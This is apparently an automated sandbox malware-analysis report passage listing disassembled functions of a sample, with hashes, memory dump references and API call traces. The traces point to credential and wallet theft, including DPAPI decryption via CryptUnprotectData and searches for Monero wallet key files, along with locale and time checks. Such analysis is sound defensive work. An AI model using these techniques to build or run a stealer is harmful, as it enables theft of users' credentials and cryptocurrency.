                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2;}k$8wm$:4GM$Bk$E`uy$T&$u\t$h9$kM
                              • API String ID: 0-1077557972
                              • Opcode ID: 0db9be9c4fbd18b59efea8cdf83bed6a346733f211107972c52a0133559e3463
                              • Instruction ID: cd7b0a8ac3646f9105373f0a967b44d5f91238c8cbfabea1d39ee80aa88f9fcf
                              • Opcode Fuzzy Hash: 0db9be9c4fbd18b59efea8cdf83bed6a346733f211107972c52a0133559e3463
                              • Instruction Fuzzy Hash: 54B22AF3A0C6049FE304AE2DEC8567AFBD9EFD4620F1A853DE6C4C7744E93598058692
                              Function 004F5DFE Relevance: 12.8, Strings: 9, Instructions: 1599COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: +M{$:uJ~$L@$W_}$s3FT$vYz$}m?r$T-[$rI
                              • API String ID: 0-2702800542
                              • Opcode ID: aaeea504ebabc7c362fac79c0566d844f90eba262babd118dda339e907ca4c29
                              • Instruction ID: 71fe0850dc0dd09582b31843ae4089e6d0e4ad29473a42c7bbdb62e56108772f
                              • Opcode Fuzzy Hash: aaeea504ebabc7c362fac79c0566d844f90eba262babd118dda339e907ca4c29
                              • Instruction Fuzzy Hash: C7A2E8F360C204AFE3046E2DEC8567ABBEAEFD4720F16853DE6C487744EA3558058697
                              Function 00137B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,001405AF), ref: 00137BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00137BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00137C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00137C62
                              • LocalFree.KERNEL32(00000000), ref: 00137D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 7b332f9676ed224728a506af4a4111183900368e49f1b83c2c3863dd74b536e5
                              • Instruction ID: 8a8bd31369dcb315163156ae4481430a9d1446727e92e3d38b109a533303df1f
                              • Opcode Fuzzy Hash: 7b332f9676ed224728a506af4a4111183900368e49f1b83c2c3863dd74b536e5
                              • Instruction Fuzzy Hash: 5B415CB1940218ABDB24DB94DC99BEEB7B8FF58700F6041D9E10972291DB742F85CFA1
                              Function 0012E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00140D73), ref: 0012E4A2
                              • StrCmpCA.SHLWAPI(?,001414F8), ref: 0012E4F2
                              • StrCmpCA.SHLWAPI(?,001414FC), ref: 0012E508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0012EBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: c23029138ca3126f0365a6ebe5e17121c026f99762df48cfbf21b10f90f69271
                              • Instruction ID: 943155b9e8a84cf15600d4df7871d17542093e3f6dd393d9d3d8fa5e459b70d1
                              • Opcode Fuzzy Hash: c23029138ca3126f0365a6ebe5e17121c026f99762df48cfbf21b10f90f69271
                              • Instruction Fuzzy Hash: 8A122272910118AADB15FB70DCA6EED7378AF64300FC045E9B54AA6191EF306F49CF92
                              Function 004F77A9 Relevance: 9.1, Strings: 6, Instructions: 1591COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 'Ho$1=W7$2d$3"'O$^N5n$o,uR
                              • API String ID: 0-3401262283
                              • Opcode ID: 107facfd829c9180bfef4878f938ae53567e6e10da7b36b870583174a72fcbda
                              • Instruction ID: 6f09c1f025ff4ba0c4b853605a7d5e5c5237512f5a2286950213b5b73575b10c
                              • Opcode Fuzzy Hash: 107facfd829c9180bfef4878f938ae53567e6e10da7b36b870583174a72fcbda
                              • Instruction Fuzzy Hash: 80B2D4F360C2009FE704AF2DEC8567AB7E9EF94720F1A893DE6C5C3744E63598058696
                              Function 004E9F9D Relevance: 7.9, Strings: 5, Instructions: 1657COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Z~v$V/|$Z*3z$jyW$nT^9
                              • API String ID: 0-1874167061
                              • Opcode ID: dcb68819b23002266927988dc60dfdb3bd96d5fec3fa05c89254bef0f783bc5e
                              • Instruction ID: 1496f3b8e89a8b631113564522097c0f9e38924eecd6708516126045536d4bef
                              • Opcode Fuzzy Hash: dcb68819b23002266927988dc60dfdb3bd96d5fec3fa05c89254bef0f783bc5e
                              • Instruction Fuzzy Hash: A5B219F360C6049FE304AE2DDC8567AFBE9EF94720F1A4A3DE6C5C3744EA3558018696
                              Function 004FC6D2 Relevance: 7.9, Strings: 5, Instructions: 1606COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: <#~g$Nb_$u3}u$vv0w$.P}
                              • API String ID: 0-1477629152
                              • Opcode ID: 61b3660f61f7e002a64b750015306ea95c0bd4a3d1b551aa7c0356aaf901ebdc
                              • Instruction ID: 70810f1f922a4cd30a5e6c696fe0374802c6be2f11c721e68a0f34de7c1cc4cc
                              • Opcode Fuzzy Hash: 61b3660f61f7e002a64b750015306ea95c0bd4a3d1b551aa7c0356aaf901ebdc
                              • Instruction Fuzzy Hash: 3BB2F5F390C6009FE304AE2DEC8567ABBE9EF94320F1A893DE6C4C7744E63558058697
                              Function 0012C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0012C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0012C87C
                              • lstrcat.KERNEL32(?,00140B46), ref: 0012C943
                              • lstrcat.KERNEL32(?,00140B47), ref: 0012C957
                              • lstrcat.KERNEL32(?,00140B4E), ref: 0012C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 3fc7ecaff79c10b07ea69e1388d288a82c64fda2a12f4327755752ad023208ab
                              • Instruction ID: a45d5b4e1bf4753ec3a9149e804832717c0d4d60f24d2d3ed60ccdc5bd0e2d7f
                              • Opcode Fuzzy Hash: 3fc7ecaff79c10b07ea69e1388d288a82c64fda2a12f4327755752ad023208ab
                              • Instruction Fuzzy Hash: DF4140B590421ADFDB10DFA4DD89BEEF7B8BB48704F1041A8E609B7280D7B55A84CF91
                              Function 00136920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0013696C
                              • sscanf.NTDLL ref: 00136999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001369B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001369C0
                              • ExitProcess.KERNEL32 ref: 001369DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: d60cccd9c2144e3fe9e997b84254e0b2a2617d100dffcd8be17a4234283f1b1e
                              • Instruction ID: 362fc58acba6113489f9a8793d8a2b8a493f7c72814477dc0c0a0d98de1b6306
                              • Opcode Fuzzy Hash: d60cccd9c2144e3fe9e997b84254e0b2a2617d100dffcd8be17a4234283f1b1e
                              • Instruction Fuzzy Hash: 0821E9B5D00208AFCF05EFE4D945AEEBBB9BF48300F04856AE406F3250EB745604CBA9
                              Function 00127240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0012724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00127254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00127281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001272A4
                              • LocalFree.KERNEL32(?), ref: 001272AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 681203c498063b16d3d3cc00c0f024780ed2603c00896c7955e9ebd8d61fa440
                              • Instruction ID: 5847988b458b6ae84ee6490667c59c53c6e4e8377666f5356d05359ae0decdfb
                              • Opcode Fuzzy Hash: 681203c498063b16d3d3cc00c0f024780ed2603c00896c7955e9ebd8d61fa440
                              • Instruction Fuzzy Hash: AF011275A44208BBDB14DFD4DD45F9E7BB8EB44704F108158FB05BB2C0D7B0AA008B65
                              Function 00139600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0013961E
                              • Process32First.KERNEL32(00140ACA,00000128), ref: 00139632
                              • Process32Next.KERNEL32(00140ACA,00000128), ref: 00139647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0013965C
                              • CloseHandle.KERNEL32(00140ACA), ref: 0013967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 88122ffbb3d4b0d7bf453696e55ea41f6c4b77d61003ccdcc813b9386d627c4c
                              • Instruction ID: 3edae1e8f62b6e73cc3241cfb8baffce8ae030b9dd094dcc89063519ea017851
                              • Opcode Fuzzy Hash: 88122ffbb3d4b0d7bf453696e55ea41f6c4b77d61003ccdcc813b9386d627c4c
                              • Instruction Fuzzy Hash: E9011EB5A01208EBCB15DFA5CD49BEDBBF8EB48300F108188E909A7250E7B4AB40DF51
                              Function 00138EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00125184,40000001,00000000,00000000,?,00125184), ref: 00138EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
